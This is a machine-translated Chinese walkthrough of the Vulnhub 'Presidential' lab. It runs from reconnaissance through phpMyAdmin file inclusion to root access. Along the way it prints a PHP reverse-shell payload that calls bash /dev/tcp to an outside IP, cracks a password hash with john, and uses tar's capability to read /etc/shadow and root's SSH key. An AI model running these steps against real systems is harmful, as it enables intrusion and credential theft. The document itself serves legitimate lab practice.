当前位置:网站首页>Vulnhub's presidential
Vulnhub's presidential
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Catalog
3、 ... and 、 Service version discovery
5、 ... and 、 Directory scanning
6、 ... and 、 Subdomain explosion
Nine 、john Of hash It's worth blasting
11、 ... and 、tars Raise the right
One 、nmap The host found
Make one based on ping Scan , Others are a little slow

Two 、 Port scanning

3、 ... and 、 Service version discovery

Four 、 information gathering
1. Home page
As for other functions , Source code division , It doesn't have much effect on us .

5、 ... and 、 Directory scanning
Check one by one , No response , The domain name is collected above , Bind domain name , Trying to .

1. Bind domain name
2./config.php.bak
This one has 107B The data of . Under the source code, we found the name of the database , Account and password

6、 ... and 、 Subdomain explosion
Burst out one database.votenow.local, binding ip, After the visit .

Find a phpmyadmin The login interface of , Combined with the account and password we found earlier , Sign in phpmyadmin.

7、 ... and 、phpmyadmin
1. View version
、
2. Vulnerability search
There are three loopholes , Let's use 44928.txt The file contains a vulnerability .

3. The contents of the document
First use the database to write files , Then let's use the file to contain the execution file
4. Try
Be careful : take sessions Change it to session, Otherwise it won't work
Write the domain name in front , Followed by session Just ok 了

8、 ... and 、 rebound shell
Log out and log in again to get a new session, The remaining steps are similar to the above
select '<?php system('bash -i >& /dev/tcp/192.168.0.107/8888 0>&1');exit;?>'

Nine 、john Of hash It's worth blasting
stay phpmyadmin We also found a user name and hash value
admin $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i
Try blasting
john hash --wordlist=rockyou.txt
Stella

su admin
and python Go back shell

Ten 、capability
1. View with capability Authority
getcap -r / 2>/dev/null
2. Means :
Permitted
This set defines the upper limit of privileges that a thread can have , yes Inheritable and Effective Superset of sets
Effective
When the kernel checks for privileged operations , Set of actual inspections ( You can add / Delete Effective Medium capabilities, To achieve temporary opening / Function of permission )

3. Check one by one
Find us admin Commands that users can execute .tars We can execute .

11、 ... and 、tars Raise the right
1. Read /etc/shadow
Read compression
tar -cf archive.tar /etc/shadow
decompression
tar -xf archive.tar
Use the inside root Of hash value , Find a dictionary to touch . Finding the right dictionary should be able to crack it

2. Read the private key file
Same as above tarS To read the file , Then decompress . Put it in admin Of .ssh below , And then through ssh Sign in , Mention right to success
ssh -i id_rsa [email protected] -p 2082

Get flag

边栏推荐
猜你喜欢

Qt+VTK+OCCT读取IGES/STEP模型

DS90UB949

C language AES encryption and decryption

ftp登录时,报错“530 Login incorrect.Login failed”

(database authorization - redis) summary of unauthorized access vulnerabilities in redis

XML (DTD, XML parsing, XML modeling)

Xml的(DTD,xml解析,xml建模)

vulnhub之cereal

聊聊Flink框架中的状态管理机制

导师对帮助研究生顺利完成学业提出了20条劝告:第一,不要有度假休息的打算.....
随机推荐
The tutor put forward 20 pieces of advice to help graduate students successfully complete their studies: first, don't plan to take a vacation
mysql使用update联表更新的方法
Hongmeng third training (project training)
repo ~ 常用命令
聊聊Flink框架中的状态管理机制
如何将数字字符串转换为整数
ArcGIS应用(二十一)Arcmap删除图层指定要素的方法
rxjs Observable filter Operator 的实现原理介绍
The LINQ expression node type 'ArrayIndex' is not supported in LINQ to Entities
OpenStack中的测试分类
Web安全总结
Key switch: press FN when pressing F1-F12
Event preview | the live broadcast industry "rolled in" to drive new data growth points with product power
(数据库提权——Redis)Redis未授权访问漏洞总结
P3250 [HNOI2016] 网络 + [NECPC2022] F.Tree Path 树剖+线段树维护堆
(database authorization - redis) summary of unauthorized access vulnerabilities in redis
量化计算调研
银泰百货点燃城市“夜经济”
抓包整理外篇fiddler———— 会话栏与过滤器[二]
STL Tutorial 9 deep copy and shallow copy of container elements